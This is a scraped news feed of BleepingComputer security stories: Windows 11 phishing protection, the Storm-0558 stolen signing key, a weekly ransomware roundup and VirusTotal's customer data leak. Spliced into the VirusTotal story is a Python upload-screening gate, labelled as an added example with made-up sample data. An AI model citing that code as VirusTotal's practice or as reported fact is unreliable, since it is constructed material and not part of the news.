</p>

<p>
	One of the most common methods threat actors use to gain access to websites or a corporate network is to purchase or steal corporate credentials. These credentials are obtained initially through phishing attacks or via information-stealing malware.
</p>

<p>
	 
</p>

<p>
	Threat actors use these stolen credentials to access other accounts used by the Windows user, including email accounts, bank accounts, and cryptocurrency trading accounts. Even worse, these stolen accounts can be used to access corporate networks, allowing the hackers to spread laterally on a network to conduct BEC scams, data theft, supply chain attacks, and ransomware attacks.
</p>

<p>
	 
</p>

<p>
	Stolen credentials are a massive and widespread problem, with cybercrime marketplaces <a href="https://www.bleepingcomputer.com/news/security/over-15-billion-credentials-in-circulation-on-hacker-forums/" target="_blank" rel="external nofollow">selling billions of credentials and authentication cookies</a> and more specialized sites <a href="https://www.bleepingcomputer.com/news/security/logins-for-13-million-windows-rdp-servers-collected-from-hacker-market/" target="_blank" rel="external nofollow">selling over a million remote desktop credentials</a>.
</p>

<p>
	 
</p>

<div style="text-align:center">
	<p style="text-align: left;">
		<img alt="rdp-server-details.jpg" class="ipsImage" data-ratio="75.10" height="461" width="720" src="https://www.bleepstatic.com/images/news/security/d/data-leaks/uas/rdp-server-details.jpg">
	</p>

	<p style="text-align: left;">
		<em>Stolen RDP credentials sold on dark web marketplace</em>
	</p>

	<p style="text-align: left;">
		 
	</p>
</div>

<p>
	Due to this widespread abuse, law enforcement has been actively targeting stolen credential marketplaces, <a href="https://www.bleepingcomputer.com/news/security/us-seizes-wt1shop-market-selling-credit-cards-credentials-and-ids/" target="_blank" rel="external nofollow">seizing the WT1SHOP</a> in 2022 and, more recently, <a href="https://www.bleepingcomputer.com/news/security/fbi-seizes-stolen-credentials-market-genesis-in-operation-cookie-monster/" target="_blank" rel="external nofollow">taking down the Genesis Market</a>.
</p>

<h2>
	Windows 11's Enhanced Phishing Protection
</h2>

<p>
	When Microsoft first released the new Windows Enhanced Phishing protection, it only warned users when they manually typed their Windows password into a document or web login page.
</p>

<p>
	 
</p>

<p>
	However, as it's commonly advised that users use password managers to create strong and unique passwords for all their logins, many people copy and paste their passwords from the password manager into their login prompts.
</p>

<p>
	 
</p>

<p>
	As the feature did not previously protect against copy and paste, this would bypass the Windows security feature.
</p>

<p>
	 
</p>

<p>
	With the release of Windows 11 Insider Dev build 23506, Microsoft has enhanced the phishing protection feature by now detecting the copy and paste of a user's Windows password.
</p>

<p>
	 
</p>

<p>
	"We are trying out a change starting with this build where users who have enabled warning options for Windows Security under App &amp; browser control &gt; Reputation-based protection &gt; Phishing protection will see a UI warning on unsafe password copy and paste, just as they currently see when they type in their password," reads the <a href="https://blogs.windows.com/windows-insider/2023/07/19/announcing-windows-11-insider-preview-build-23506/" rel="external nofollow" target="_blank">Dev build release notes</a>.
</p>

<p>
	 
</p>

<p>
	As this feature is not enabled by default, Windows users should turn it on by going to <strong>Windows Security</strong> &gt; <strong>App &amp; browser control</strong> &gt; <strong>Reputation-based protection</strong> &gt; <strong>Phishing protection</strong> and putting checkmarks under all three options, as shown below.
</p>

<p>
	 
</p>

<div style="text-align:center">
	<p style="text-align: left;">
		<img alt="phishing-protection-settings.jpg" class="ipsImage" data-ratio="75.10" height="415" width="720" src="https://www.bleepstatic.com/images/news/Microsoft/windows-11/e/enhanced-phishing-protection/copy-paste/phishing-protection-settings.jpg">
	</p>

	<p style="text-align: left;">
		<em>Phishing protection enabled in Windows 11. Source: BleepingComputer</em>
	</p>

	<p style="text-align: left;">
		 
	</p>
</div>

<p>
	Once enabled, this feature will warn users when they type or copy and paste their Windows logon password into website forms or documents.
</p>

<p>
	 
</p>

<p>
	This alert will be titled "Password reuse is a security risk," and warns users to reset their Windows account password, linking to this <a href="https://support.microsoft.com/en-us/topic/protect-your-microsoft-password-from-being-phished-e4e8e611-e4b3-4be9-914c-db1657c337cf" rel="external nofollow" target="_blank">support document</a>.
</p>

<p>
	 
</p>

<p>
	"If your password is stolen from this site, attackers will try to use it on other sites too. Use strong, unique passwords to keep your personal information safe," reads the Windows phishing protection alert.
</p>

<p>
	 
</p>

<p>
	"Microsoft recommends changing your local Windows account password."
</p>

<p>
	 
</p>

<div style="text-align:center">
	<p style="text-align: left;">
		<img alt="phishing-protection-settings.jpg" class="ipsImage" data-ratio="75.10" height="415" width="720" src="https://www.bleepstatic.com/images/news/Microsoft/windows-11/e/enhanced-phishing-protection/copy-paste/phishing-protection-settings.jpg">
	</p>

	<p style="text-align: left;">
		<em>Windows 11 phishing protection warning. Source: BleepingComputer</em>
	</p>

	<p style="text-align: left;">
		 
	</p>
</div>

<p>
	While our previous Windows Enhanced Phishing Protection test showed that it did not work with certain applications, such as Firefox and Excel, today's tests show that this has been fixed, making the feature more robust.
</p>

<p>
	 
</p>

<p>
	However, it still does not work with other third-party applications that could commonly be used to store passwords, such as Notepad2, Notepad++, and likely many others.
</p>

<p>
	 
</p>

<p>
	Microsoft has also introduced a new "Warn others about suspicious apps and sites" phishing protection setting, but there is no information about this new setting and who 'others' represents.
</p>

<p>
	 
</p>

<p>
	Microsoft has not answered our questions related to this new setting.
</p>

<p>
	 
</p>

<p>
	Finally, it must be noted that the Windows 11 Phishing protection feature does not work if you use Windows Hello, such as PIN or biometrics, to log in to Windows.
</p>

<p>
	 
</p>

<p>
	For this feature to work, Windows users must log in with a password so that it is cached in memory and can be compared against entered text (typed or copied and pasted).
</p>

<p>
	 
</p>

<p>
	As this feature can be a powerful tool to protect corporate credentials, instantly alerting admins when a user is reusing their Windows password, trading the convenience of Windows Hello for better security is worth it.
</p>

<p>
	 
</p>

<p>
	It is recommended that all Windows users enable this security feature in Windows Security, even if it does not support all applications now.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-enhances-windows-11-phishing-protection-with-new-features/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17268</guid><pubDate>Sun, 23 Jul 2023 19:13:24 +0000</pubDate></item><item><title>Stolen Microsoft key offered widespread access to Microsoft cloud services</title><link>https://nsaneforums.com/news/security-privacy-news/stolen-microsoft-key-offered-widespread-access-to-microsoft-cloud-services-r17258/</link><description><![CDATA[<p>
	The Microsoft consumer signing key stolen by Storm-0558 Chinese hackers provided them with access far beyond the Exchange Online and Outlook.com accounts that Redmond said were compromised, according to Wiz security researchers.
</p>

<p>
	 
</p>

<p>
	Redmond <a href="https://www.bleepingcomputer.com/news/security/microsoft-chinese-hackers-breached-us-govt-exchange-email-accounts/" rel="external nofollow" target="_blank">revealed</a> on July 12th that the attackers had breached the Exchange Online and Azure Active Directory (AD) accounts of around two dozen organizations. This was achieved by exploiting a now-patched zero-day validation issue in the GetAccessTokenForResource API, allowing them to forge signed access tokens and impersonate accounts within the targeted organizations.
</p>

<p>
	 
</p>

<p>
	The affected entities included government agencies in the U.S. and Western European regions, with <a href="https://abcnews.go.com/Politics/commerce-secretary-gina-raimondos-emails-hacked-microsoft-cyber/story?id=101201179" rel="external nofollow" target="_blank">the U.S. State and Commerce Departments</a> among them.
</p>

<p>
	 
</p>

<p>
	On Friday, Wiz security researcher Shir Tamari <a href="http://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr" rel="external nofollow" target="_blank">said</a> that the impact extended to all Azure AD applications operating with Microsoft's OpenID v2.0. This was due to the stolen key's ability to sign any OpenID v2.0 access token for personal accounts (e.g., Xbox, Skype) and multi-tenant AAD apps.
</p>

<p>
	 
</p>

<p>
	Microsoft clarified after this article was published that the issue only impacted applications that accepted personal accounts and had the validation error.
</p>

<p>
	 
</p>

<p>
	While Microsoft said that only Exchange Online and Outlook were impacted, Wiz says the threat actors could use the compromised Microsoft consumer signing key to impersonate any account within any impacted customer or cloud-based Microsoft application.
</p>

<p>
	 
</p>

<p>
	"This includes managed Microsoft applications, such as Outlook, SharePoint, OneDrive, and Teams, as well as customers' applications that support Microsoft Account authentication, including those who allow the 'Login with Microsoft' functionality," Tamari said.
</p>

<p>
	 
</p>

<p>
	"Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Wiz CTO and Cofounder Ami Luttwak also told BleepingComputer.
</p>

<p>
	 
</p>

<p>
	"An attacker with an AAD signing key is the most powerful attacker you can imagine, because they can access almost any app – as any user. This is the ultimate cyber intelligence 'shape shifter' superpower."
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="Compromised_MS_key_impact.png" class="ipsImage" data-ratio="75.10" height="449" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2023/Compromised_MS_key_impact.png">
	</p>

	<div>
		<em>Compromised Microsoft signing key impact (Wiz)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	In response to the security breach, Microsoft revoked all valid MSA signing keys to ensure that the threat actors didn't have access to other compromised keys.
</p>

<p>
	 
</p>

<p>
	This measure also thwarted any attempts to generate new access tokens. Further, Redmond relocated the newly generated access tokens to the key store for the company's enterprise systems.
</p>

<p>
	 
</p>

<p>
	After invalidating the stolen signing key, Microsoft found no further evidence suggesting additional unauthorized access to its customers' accounts using the same auth token forging technique.
</p>

<p>
	 
</p>

<p>
	Additionally, Microsoft reported observing a shift in Storm-0558 tactics, showing that the threat actors no longer had access to any signing keys.
</p>

<p>
	 
</p>

<p>
	Last but not least, the company revealed last Friday that it <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-still-unsure-how-hackers-stole-azure-ad-signing-key/" target="_blank" rel="external nofollow">still doesn't know</a> how the Chinese hackers stole the Microsoft consumer signing key. However, after pressure from CISA, they agreed to <a data-sk="tooltip_parent" data-stringify-link="https://www.bleepingcomputer.com/news/microsoft/microsoft-expands-access-to-cloud-logging-data-for-free-after-exchange-hacks/" delay="150" href="https://www.bleepingcomputer.com/news/microsoft/microsoft-expands-access-to-cloud-logging-data-for-free-after-exchange-hacks/" rel="external nofollow" target="_blank">expand access to cloud logging data for free</a> to help defenders detect similar breach attempts in the future.
</p>

<p>
	 
</p>

<p>
	Before this, these logging capabilities were only available to Microsoft customers who paid for a Purview Audit (Premium) logging license. As a result, Microsoft faced considerable criticism for impeding organizations from promptly detecting Storm-0558 attacks.
</p>

<p>
	 
</p>

<p>
	"At this stage, it is hard to determine the full extent of the incident as there were millions of applications that were potentially vulnerable, both Microsoft apps and customer apps, and the majority of them lack the sufficient logs to determine if they were compromised or not," Tamari concluded today.
</p>

<p>
	 
</p>

<p>
	<strong>Update 7/22/23</strong>: Updated article with clarifications from Microsoft.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/stolen-microsoft-key-offered-widespread-access-to-microsoft-cloud-services/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17258</guid><pubDate>Sat, 22 Jul 2023 20:28:24 +0000</pubDate></item><item><title>The Week in Ransomware - July 21st 2023 - Avaddon Back as NoEscape</title><link>https://nsaneforums.com/news/security-privacy-news/the-week-in-ransomware-july-21st-2023-avaddon-back-as-noescape-r17242/</link><description><![CDATA[<p>
	This edition of the Week in Ransomware covers the last two weeks of news, as we could not cover it last week, and includes quite a bit of new information, including the return of the Avaddon ransomware gang.
</p>

<p>
	 
</p>

<p>
	Last month, a new ransomware operation named NoEscape (or No_Escape) was launched that quickly began amassing a stream of new corporate victims.
</p>

<p>
	 
</p>

<p>
	After the operation's encryptor was analyzed, it soon became apparent that <a href="https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor/" target="_blank" rel="external nofollow">NoEscape was a rebrand of Avaddon</a>, who shut down their operation in June 2020 after feeling the heat from law enforcement.
</p>

<p>
	 
</p>

<p>
	However, it looks like the gang never really retired but was simply biding their time until they could return as the new NoEscape operation, likely previously working in other operations.
</p>

<p>
	 
</p>

<p>
	While the gang has claimed not to have any affiliation with Avaddon, their encryptor is very similar to the former operation's ransomware, according to ransomware expert Michael Gillespie.
</p>

<p>
	 
</p>

<p>
	This includes a unique encryption chunking routine only used by Avaddon, similarities in code, the <a href="https://twitter.com/malwrhunterteam/status/1665669209689317379" rel="external nofollow" target="_blank">same configuration file format</a>, and <a href="https://analyze.intezer.com/analyses/b51d8de4-630c-4a56-8843-8694d38f4862" rel="external nofollow" target="_blank">many other routines</a>. The only significant change was the switch from AES encryption to Salsa20.
</p>

<p>
	 
</p>

<p>
	Law enforcement has been busy, <a href="https://www.bleepingcomputer.com/news/security/police-arrests-ukrainian-scareware-developer-after-10-year-hunt/" target="_blank" rel="external nofollow">arresting a Ukrainian scareware developer</a> after a 10-year hunt and an <a href="https://www.bleepingcomputer.com/news/security/it-worker-jailed-for-impersonating-ransomware-gang-to-extort-employer/" target="_blank" rel="external nofollow">IT employee sentenced to over three years in prison</a> for impersonating a ransomware gang in an extortion scheme.
</p>

<p>
	 
</p>

<p>
	In other ransomware reports from BleepingComputer and cybersecurity firms:
</p>

<p>
	 
</p>

<ul>
	<li>
		A new <a href="https://www.bleepingcomputer.com/news/security/cybersecurity-firm-sophos-impersonated-by-new-sophosencrypt-ransomware/" target="_blank" rel="external nofollow">SophosEncrypt ransomware impersonates Sophos</a>
	</li>
	<li>
		FIN8 threat actors were seen <a href="https://www.bleepingcomputer.com/news/security/fin8-deploys-alphv-ransomware-using-sardonic-malware-variant/" target="_blank" rel="external nofollow">deploying the ALPHV ransomware using Sardonic malware</a>
	</li>
	<li>
		The new <a href="https://www.bleepingcomputer.com/news/security/new-big-head-ransomware-displays-fake-windows-update-alert/" target="_blank" rel="external nofollow">Big Head ransomware displays fake Windows update alerts</a>
	</li>
</ul>

<p>
	 
</p>

<p>
	Finally, Clop's data theft attacks using the MOVEit Transfer zero-day continue to be a hot topic in the news, with companies continuing to disclose data breaches as they are added to the gang's data leak site.
</p>

<p>
	 
</p>

<p>
	According to <a href="http://www.coveware.com/blog/2023/7/21/ransom-monetization-rates-fall-to-record-low-despite-jump-in-average-ransom-payments" rel="external nofollow" target="_blank">a new Coveware report</a> released today, these attacks have been very successful, with the ransomware gang expected to <a href="https://www.bleepingcomputer.com/news/security/clop-gang-to-earn-over-75-million-from-moveit-extortion-attacks/" target="_blank" rel="external nofollow">earn $75-100 million in extortion payments</a>.
</p>

<p>
	 
</p>

<p>
	Contributors and those who provided new ransomware information and stories this week include: <a href="https://twitter.com/demonslay335" rel="external nofollow" target="_blank">@demonslay335</a>, <a href="https://twitter.com/Seifreed" rel="external nofollow" target="_blank">@Seifreed</a>, <a href="https://twitter.com/BleepinComputer" rel="external nofollow" target="_blank">@BleepinComputer</a>, <a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">@malwrhunterteam</a>, <a href="https://twitter.com/billtoulas" rel="external nofollow" target="_blank">@billtoulas</a>, <a href="https://twitter.com/Ionut_Ilascu" rel="external nofollow" target="_blank">@Ionut_Ilascu</a>, <a href="https://twitter.com/struppigel" rel="external nofollow" target="_blank">@struppigel</a>, <a href="https://twitter.com/fwosar" rel="external nofollow" target="_blank">@fwosar</a>, <a href="https://twitter.com/LawrenceAbrams" rel="external nofollow" target="_blank">@LawrenceAbrams</a>, <a href="https://twitter.com/serghei" rel="external nofollow" target="_blank">@serghei</a>, <a href="https://twitter.com/chainalysis" rel="external nofollow" target="_blank">@chainalysis</a>, <a href="https://twitter.com/trendmicro" rel="external nofollow" target="_blank">@TrendMicro</a>, <a href="https://twitter.com/Intel_by_KELA" rel="external nofollow" target="_blank">@Intel_by_KELA</a>, <a href="https://twitter.com/pcrisk" rel="external nofollow" target="_blank">@pcrisk</a>, <a href="https://twitter.com/SophosXOps" rel="external nofollow" target="_blank">@SophosXOps</a>, <a href="https://twitter.com/coveware" rel="external nofollow" target="_blank">@coveware</a>, <a href="https://twitter.com/BroadcomSW" rel="external nofollow" target="_blank">@BroadcomSW</a>, <a href="https://twitter.com/pcrisk" rel="external nofollow" target="_blank">@pcrisk</a>, and <a href="https://twitter.com/azalsecurity" rel="external nofollow" role="link" tabindex="-1" target="_blank">@azalsecurity</a>.
</p>

<h2>
	July 8th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/new-big-head-ransomware-displays-fake-windows-update-alert/" target="_blank" rel="external nofollow">New ‘Big Head’ ransomware displays fake Windows update alert</a>
</h3>

<p>
	Security researchers have dissected a recently emerged ransomware strain named ‘Big Head’ that may be spreading through malvertising that promotes fake Windows updates and Microsoft Word installers.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1678681498667429888" rel="external nofollow" target="_blank">New Makop Ransomware variant</a>
</h3>

<p>
	<a href="http://twitter.com/pcrisk" rel="external nofollow" target="_blank">PCrisk</a> found new Makop ransomware variants that append the .rajah extension and drop a ransom note named +README-WARNING+.txt.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1678642558707154946" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP variants that append the .gayn and .gazp extensions.
</p>

<h2>
	July 12th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/ransomware-payments-on-record-breaking-trajectory-for-2023/" target="_blank" rel="external nofollow">Ransomware payments on record-breaking trajectory for 2023</a>
</h3>

<p>
	Data from the first half of the year indicates that ransomware activity is on track to break previous records, seeing a rise in the number of payments, both big and small.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1678988823433211904" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP variants that append the .waqq and .gaqq extensions.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1678994091097374720" rel="external nofollow" target="_blank">New Chaos ransomware variant</a>
</h3>

<p>
	PCRisk found a new Chaos variant that appends the .hackedbySnea575 extension and drops a ransom note named README_txt.txt.
</p>

<h2>
	July 14th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/shutterfly-says-clop-ransomware-attack-did-not-impact-customer-data/" target="_blank" rel="external nofollow">Shutterfly says Clop ransomware attack did not impact customer data</a>
</h3>

<p>
	Shutterfly, an online retail and photography manufacturing platform, is among the latest victims hit by Clop ransomware.
</p>

<h2>
	July 17th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor/" target="_blank" rel="external nofollow">Meet NoEscape: Avaddon ransomware gang's likely successor</a>
</h3>

<p>
	The new NoEscape ransomware operation is believed to be a rebrand of Avaddon, a ransomware gang that shut down and released its decryption keys in 2021.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/police-arrests-ukrainian-scareware-developer-after-10-year-hunt/" target="_blank" rel="external nofollow">Police arrests Ukrainian scareware developer after 10-year hunt</a>
</h3>

<p>
	The Spanish National Police has apprehended a Ukrainian national wanted internationally for his involvement in a scareware operation spanning from 2006 to 2011.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/it-worker-jailed-for-impersonating-ransomware-gang-to-extort-employer/" target="_blank" rel="external nofollow">IT worker jailed for impersonating ransomware gang to extort employer</a>
</h3>

<p>
	28-year-old Ashley Liles, a former IT employee, has been sentenced to over three years in prison for attempting to blackmail his employer during a ransomware attack.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1680803096551669760" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP variants that append the .miza, .mitu, and .miqe extensions.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1680825981299294211" rel="external nofollow" target="_blank">New Xorist variant</a>
</h3>

<p>
	PCrisk found a new Xorist variant that appends the .PrO extension and drops a ransom note named HOW TO DECRYPT FILES.txt.
</p>

<h2>
	July 18th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/cybersecurity-firm-sophos-impersonated-by-new-sophosencrypt-ransomware/" target="_blank" rel="external nofollow">Cybersecurity firm Sophos impersonated by new SophosEncrypt ransomware</a>
</h3>

<p>
	Cybersecurity vendor Sophos is being impersonated by a new ransomware-as-a-service called SophosEncrypt, with the threat actors using the company name for their operation.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/fin8-deploys-alphv-ransomware-using-sardonic-malware-variant/" target="_blank" rel="external nofollow">FIN8 deploys ALPHV ransomware using Sardonic malware variant</a>
</h3>

<p>
	A financially motivated cybercrime gang has been observed deploying BlackCat ransomware payloads on networks backdoored using a revamped Sardonic malware version.
</p>

<h2>
	July 19th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/est-e-lauder-beauty-giant-breached-by-two-ransomware-gangs/" target="_blank" rel="external nofollow">Estée Lauder beauty giant breached by two ransomware gangs</a>
</h3>

<p>
	Two ransomware actors, ALPHV/BlackCat and Clop, have listed beauty company Estée Lauder on their data leak sites as a victim of separate attacks.
</p>

<h2>
	July 20th 2023
</h2>

<h3>
	<a href="https://blog.cyble.com/2023/07/20/kanti-a-nim-based-ransomware-unleashed-in-the-wild/" rel="external nofollow" target="_blank">Kanti: A NIM-Based Ransomware Unleashed in the Wild</a>
</h3>

<p>
	New programming languages often have fewer security measures and less mature detection mechanisms than well-established ones. Threat Actors (TAs) often attempt to bypass traditional security defenses and avoid detection by using a less-known programming language.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1681904523697061888" rel="external nofollow" target="_blank">New Khronos ransomware</a>
</h3>

<p>
	PCrisk found a new Khronos ransomware that appends the .khronos extension and drops a ransom note named info.hta.
</p>

<h2>
	July 21st, 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/clop-gang-to-earn-over-75-million-from-moveit-extortion-attacks/" target="_blank" rel="external nofollow">Clop gang to earn over $75 million from MOVEit extortion attacks</a>
</h3>

<p>
	The Clop ransomware gang is expected to earn between $75-100 million from extorting victims of their massive MOVEit data theft campaign.
</p>

<h3>
	<a href="https://www.coveware.com/blog/2023/7/21/ransom-monetization-rates-fall-to-record-low-despite-jump-in-average-ransom-payments" rel="external nofollow" target="_blank">Ransom Monetization Rates Fall to Record Low Despite Jump In Average Ransom Payments</a>
</h3>

<p>
	In the second quarter of 2023, the percentage of ransomware attacks that resulted in the victim paying fell to a record low of 34%. The trend represents the compounding effects that we have noted previously of companies continuing to invest in security, continuity assets, and incident response training. Despite these encouraging statistics, ransomware threat actors and the entire cyber extortion economy continue to evolve their attack and extortion tactics.
</p>

<h3>
	<a href="https://twitter.com/azalsecurity/status/1682407805708279808" rel="external nofollow" target="_blank">Bl00dy ransomware gang returns</a>
</h3>

<p>
	<a href="https://twitter.com/azalsecurity" rel="external nofollow" role="link" target="_blank">AzAl Security</a> noted that the ransomware gang is recruiting new affiliates, but requires a payment first.
</p>

<p>
	 
</p>

<p>
	Bl00dy ransomware has now advertised on the RAMP forum and is asking 10k USD to join their affiliate program. This is half the price of LockBit's fee. Bl00dy appears to have felt some heat and is looking to be more covert. Notably, the poster appears to be a native English speaker.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1682244098210553859" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP variants that append the .kiqu and .kizu extensions.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1682257990202605569" rel="external nofollow" target="_blank">New Black Hunt 2.0 ransomware</a>
</h3>

<p>
	PCrisk found a new Black Hunt 2.0 ransomware variant that appends the .Hunt2 extension and drops ransom notes named #BlackHunt_ReadMe.txt and #BlackHunt_ReadMe.hta.
</p>

<h3>
	That's it for this week! Hope everyone has a nice weekend!
</h3>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-21st-2023-avaddon-back-as-noescape/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17242</guid><pubDate>Fri, 21 Jul 2023 20:15:00 +0000</pubDate></item><item><title>VirusTotal apologizes for data leak affecting 5,600 customers</title><link>https://nsaneforums.com/news/security-privacy-news/virustotal-apologizes-for-data-leak-affecting-5600-customers-r17238/</link><description><![CDATA[<p>
	<span style="font-size:14px;">VirusTotal apologized on Friday for leaking the information of over 5,600 customers after an employee mistakenly uploaded a CSV file containing their info to the platform last month.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The data leak impacted only Premium account customers, with the uploaded file containing their names and corporate email addresses.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Emiliano Martines, the online malware scanning service's head of product management, also assured impacted customers that the incident was caused by human error and was not the result of a cyber-attack or any vulnerability with VirusTotal.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Furthermore, the leaked file was only accessible to VirusTotal partners and cybersecurity analysts with a Premium account on the platform.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Those using anonymous or free accounts cannot access the Premium platform and, consequently, cannot reach the leaked file.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"On June 29, an employee accidentally uploaded a CSV file to the VirusTotal platform. This CSV file contained limited information of our Premium account customers, specifically the names of companies, the associated VirusTotal group names, and the email addresses of group administrators," Martines <a href="https://blog.virustotal.com/2023/07/apology-and-update-on-recent-accidental.html" rel="external nofollow">said</a> on Friday.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"We removed the file, which was only accessible to partners and corporate clients, from our platform within one hour of its posting."</span>
</p>
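<p>
	<span style="font-size:14px;">The incident above is a reminder that a multi-scanner is a sharing platform: whatever an analyst submits becomes visible to every other Premium customer. The following Python gate is an added example written for this page, not VirusTotal's code, and shows one way to stop an accidental upload of a customer export before it leaves the analyst's machine. The e-mail threshold, the header keywords, the corporate domain list and the sample CSV are all constructed assumptions.</span>
</p>

```python
"""Added example, not VirusTotal's code: a pre-submission gate for a shared
malware-analysis service.  Anything uploaded is visible to other paying
customers, so a file that looks like a customer or contact list should be
stopped before it leaves the analyst's machine.  Thresholds, column keywords,
the corporate domain list and the sample CSV are all assumptions."""
import csv
import io
import re
from typing import List, Tuple

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Assumed header keywords that suggest a people/customer export rather than a sample.
PII_KEYWORDS = ("name", "email", "company", "group", "admin", "customer")
OWN_DOMAINS = {"example.com"}   # assumption: the uploader's own corporate domains
MAX_EMAILS = 5                  # assumption: more distinct addresses than this is a list

# Constructed sample resembling a customer export (no real organisations).
SAMPLE_CUSTOMER_CSV = b"""company,group_name,admin_email
Acme,acme-soc,soc@acme.example
Globex,globex-ir,ir@globex.example
Initech,initech-blue,blue@initech.example
Umbrella,umbrella-ti,ti@umbrella.example
Hooli,hooli-sec,sec@hooli.example
Example Corp,corp-admins,admin@example.com
"""
# Constructed stand-in for a genuine sample: a PE-like binary header.
SAMPLE_BINARY = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56


def assess_upload(data: bytes) -> Tuple[bool, List[str]]:
    """Return (allowed, reasons).  Empty reasons means the file may be submitted."""
    reasons: List[str] = []
    text = data.decode("utf-8", errors="replace")

    emails = {m.lower() for m in EMAIL_RE.findall(text)}
    if len(emails) > MAX_EMAILS:
        reasons.append(f"{len(emails)} distinct e-mail addresses (limit {MAX_EMAILS})")
    own = sorted(e for e in emails if e.rsplit("@", 1)[1] in OWN_DOMAINS)
    if own:
        reasons.append("addresses on own domain: " + ", ".join(own))

    # Only text files get a CSV header check; NUL bytes mark the file as binary.
    if b"\x00" not in data:
        try:
            header = next(csv.reader(io.StringIO(text)), [])
        except csv.Error:
            header = []
        hits = [h for h in header if any(k in h.lower() for k in PII_KEYWORDS)]
        if hits:
            reasons.append("CSV header names customer fields: " + ", ".join(hits))

    return (not reasons, reasons)


def submit_if_clean(data: bytes, upload) -> bool:
    """Wrap the real uploader: call it only when the gate passes."""
    allowed, reasons = assess_upload(data)
    if not allowed:
        for r in reasons:
            print("refusing upload:", r)
        return False
    upload(data)
    return True


if __name__ == "__main__":
    print(assess_upload(SAMPLE_CUSTOMER_CSV))
    print(assess_upload(SAMPLE_BINARY))
```

<p>
	<span style="font-size:14px;">The gate errs on the side of refusing: a text file with many distinct addresses, addresses on the uploader's own domains, or a header that reads like a people export is held back, while an opaque binary passes. Wiring it in front of the upload call (or a desktop-agent hook that watches the browser's file picker) turns a one-hour clean-up into a non-event.</span>
</p>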

<h2>
	<span style="font-size:14px;">Leaked info linked to government agencies worldwide</span>
</h2>

<p>
	<span style="font-size:14px;">German news outlets <a href="https://www.spiegel.de/netzwelt/web/virustotal-datenleck-offenbart-kunden-der-google-sicherheitsplattform-a-abc16326-ddff-4a11-b149-d96be7f3bdbd" rel="external nofollow">Der Spiegel</a> and <a href="https://www.derstandard.de/story/3000000178997/datenleck-bei-kritischer-google-plattform-die-bei-hackern-beliebt-ist" rel="external nofollow">Der Standard</a> were the first to report the incident on Monday.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As they reported, the 313KB leaked file contained details concerning accounts associated with official U.S. entities, including the Cyber Command, Department of Justice, Federal Bureau of Investigation (FBI), and the National Security Agency (NSA). </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Additionally, the file included accounts linked to government agencies in Germany, the Netherlands, Taiwan, and the United Kingdom.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"It is a list of 5600 names, including employees of the US intelligence service NSA and German intelligence services," Der Spiegel <a href="https://www.spiegel.de/netzwelt/web/virustotal-datenleck-offenbart-kunden-der-google-sicherheitsplattform-a-abc16326-ddff-4a11-b149-d96be7f3bdbd" rel="external nofollow">said</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Twenty accounts alone lead to the 'Cyber Command' of the USA, part of the American military and hub for offensive and defensive hacking operations. Also represented: the US Department of Justice, the US Federal Police FBI, and the Secret Service NSA."</span>
</p>

<p>
	 
</p>

<p>
